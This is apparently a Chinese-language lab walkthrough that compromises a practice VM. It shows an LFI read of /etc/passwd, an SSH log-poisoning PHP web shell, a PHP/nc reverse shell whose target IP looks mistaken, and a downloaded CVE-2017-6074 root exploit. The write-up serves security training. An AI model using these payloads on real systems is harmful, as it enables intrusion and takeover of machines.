目录
信息搜集
扫描网段确定主机IP地址
扫描该IP地址开放端口以及服务
nmap -A -p- 192.168.179.128
发现漏洞
利用IP地址登录
尝试扫描出的端口
只有8888端口有一个登录界面简单尝试了一些并没有登录成功,而在尝试80端口的时候会跳转回主页面,推测80端口是http服务的端口
爆破网站目录
dirb http://192.168.179.128
发现敏感文件泄露
http://192.168.179.128/antibot_image/
挨个点进去看一下,发现phpinfo()
右击查看源代码,发现文件包含代码
尝试文件包含
http://192.168.179.128/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd
成功执行说明这个点确实存在文件包含漏洞
但是观察这个点,只能包含本地文件远程的就别想了
利用漏洞
所以我们需要换个思路,前面扫描的时候我们看到还有一个2211端口是开启了ssh服务的。我们尝试登录ssh的时候登录信息是回被记录到/var/log/auth.log,我们可以尝试将一句话木马写入该日志,然后利用文件包含该日志文件
ssh '<?php system($_GET['shell']); ?>'@192.168.179.128 -p2211
验证一下是否被写入到日志文件中
http://192.168.179.128/antibot_image/antibots/info.php?image=../../../../../../../../../var/log/auth.log&shell=ls
查看页面源代码
么得问题已经顺利写入了
尝试getsell
利用php反弹shell
首先在kali上监听1234
nc -lvnp 1234
php反弹代码
php -r '$sock=fsockopen("192.168.179.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
需要进行url编码且将空格替换为+,再拼接起来利用文件包含
成功getshell
权限提升
利用python建立一个可交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
查看内核版本
uname -a
上GitHub上搜索并下载相应的exp
git clone https://github.com/kkamagui/linux-kernel-exploits.git
我们选择这个
运行complie.sh 编译.c文件
compile.sh CVE-2017-6074.c
在该目录下开启http服务
python -m SimpleHTTPServer 8080
在getshell里下载该文件
需要先进/tmp目录下
wget http://192.168.179.145:8080/CVE-2017-6074
查看文件权限
可以看到下载的文件是没有执行权限的
赋予权限
chmod +x CVE-2017-6074
运行该文件
./CVE-2017-6074
拿到root权限